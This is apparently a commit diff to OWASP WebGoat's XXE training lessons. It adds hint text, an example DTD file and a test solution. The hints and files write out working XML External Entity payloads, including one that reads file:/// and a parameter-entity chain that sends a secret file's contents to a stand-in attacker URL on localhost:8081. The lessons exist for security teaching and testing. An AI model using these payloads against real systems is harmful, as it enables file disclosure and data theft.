Extended and fixed some lessons
This commit is contained in:
@ -4,6 +4,7 @@ import com.google.common.base.Charsets;
|
||||
import com.google.common.io.Files;
|
||||
import lombok.SneakyThrows;
|
||||
import org.owasp.webgoat.assignments.AssignmentEndpoint;
|
||||
import org.owasp.webgoat.assignments.AssignmentHints;
|
||||
import org.owasp.webgoat.assignments.AssignmentPath;
|
||||
import org.owasp.webgoat.assignments.AttackResult;
|
||||
import org.springframework.beans.factory.annotation.Autowired;
|
||||
@ -49,6 +50,7 @@ import static org.apache.commons.lang3.RandomStringUtils.randomAlphabetic;
|
||||
* @since November 18, 2016
|
||||
*/
|
||||
@AssignmentPath("xxe/blind")
|
||||
@AssignmentHints({"xxe.blind.hints.1","xxe.blind.hints.2","xxe.blind.hints.3","xxe.blind.hints.4","xxe.blind.hints.5"})
|
||||
public class BlindSendFileAssignment extends AssignmentEndpoint {
|
||||
|
||||
static final String CONTENTS = "WebGoat 8.0 rocks... (" + randomAlphabetic(10) + ")";
|
||||
|
@ -51,7 +51,7 @@ import static org.springframework.web.bind.annotation.RequestMethod.POST;
|
||||
* @since 4/8/17.
|
||||
*/
|
||||
@AssignmentPath("xxe/simple")
|
||||
@AssignmentHints({"xxe.hints.simple.xxe.1", "xxe.hints.simple.xxe.2", "xxe.hints.simple.xxe.3", "xxe.hints.simple.xxe.4"})
|
||||
@AssignmentHints({"xxe.hints.simple.xxe.1", "xxe.hints.simple.xxe.2", "xxe.hints.simple.xxe.3", "xxe.hints.simple.xxe.4", "xxe.hints.simple.xxe.5", "xxe.hints.simple.xxe.6"})
|
||||
public class SimpleXXE extends AssignmentEndpoint {
|
||||
|
||||
private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"};
|
||||
|
@ -30,9 +30,17 @@ xxe.content.output=Welcome {0} you can now login to our website
|
||||
xxe.blind.output=Contents of the file is: {0}
|
||||
|
||||
xxe.hints.simple.xxe.1=Try submitting the form and see what happens
|
||||
xxe.hints.simple.xxe.2=XXE stands for XML External Entity attack
|
||||
xxe.hints.simple.xxe.3=Try to include your own DTD
|
||||
xxe.hints.simple.xxe.4=Try to include a doctype "(<!DOCTYPE...)" in the xml
|
||||
xxe.hints.simple.xxe.2=Use ZAP/Burp to intercept the request and try to include your own DTD
|
||||
xxe.hints.simple.xxe.3=Try to include a doctype "(<!DOCTYPE...)" in the xml
|
||||
xxe.hints.simple.xxe.4=The include can be as follows: <!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]>
|
||||
xxe.hints.simple.xxe.5=Do not forget to reference the entity
|
||||
xxe.hints.simple.xxe.6=In the comment you should references: <comment><text>&root;test</text></comment>
|
||||
|
||||
xxe.hints.content.type.xxe.1=Take a look at the content type
|
||||
xxe.hints.content.type.xxe.2=Does the endpoint only accept json messages?
|
||||
xxe.hints.content.type.xxe.2=Does the endpoint only accept json messages?
|
||||
|
||||
xxe.blind.hints.1=This assignment is more complicated you need to upload the contents of a file to the attackers site (WebWolf in this case)
|
||||
xxe.blind.hints.2=In this case you cannot combine external entities in combination with internal entities.
|
||||
xxe.blind.hints.3=Use parameter entities to perform the attack, see for example: https://www.acunetix.com/blog/articles/xml-external-entity-xxe-limitations/
|
||||
xxe.blind.hints.4=An example DTD can be found here WebGoat/images/example.dtd, include this DTD in the xml comment
|
||||
xxe.blind.hints.5=Use for the comment, be aware to replace the url accordingly: <?xml version="1.0"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM "http://localhost:8081/files/test1234/test.dtd">%remote;]><comment><text>test&send;</text></comment>
|
||||
|
@ -0,0 +1,5 @@
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!ENTITY % file SYSTEM "file:/home/nbaars/.webgoat-v8.0.0.M14/XXE/secret.txt">
|
||||
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8081/landing?text=%file;'>">
|
||||
%all;
|
||||
~
|
@ -3,5 +3,5 @@
|
||||
In modern REST frameworks the server might be able to accepts data formats that you as a developer did not think about.
|
||||
So this might result in JSON endpoints being vulnerable to XXE attacks.
|
||||
|
||||
Again same exercise but try to perform the same XML injection as we did in first assigment.
|
||||
Again same exercise but try to perform the same XML injection as we did in first assignment.
|
||||
|
||||
|
@ -71,6 +71,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
|
||||
@Test
|
||||
public void solve() throws Exception {
|
||||
File targetFile = new File(webGoatHomeDirectory, "/XXE/secret.txt");
|
||||
//Host DTD on WebWolf site
|
||||
String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
|
||||
"<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" +
|
||||
"<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:8081/landing?text=%file;'>\">\n" +
|
||||
@ -80,6 +81,8 @@ public class BlindSendFileAssignmentTest extends LessonTest {
|
||||
.withStatus(200)
|
||||
.withBody(dtd)));
|
||||
webwolfServer.stubFor(get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200)));
|
||||
|
||||
//Make the request from WebGoat
|
||||
String xml = "<?xml version=\"1.0\"?>" +
|
||||
"<!DOCTYPE comment [" +
|
||||
"<!ENTITY % remote SYSTEM \"http://localhost:8081/files/test.dtd\">" +
|
||||
|
Reference in New Issue
Block a user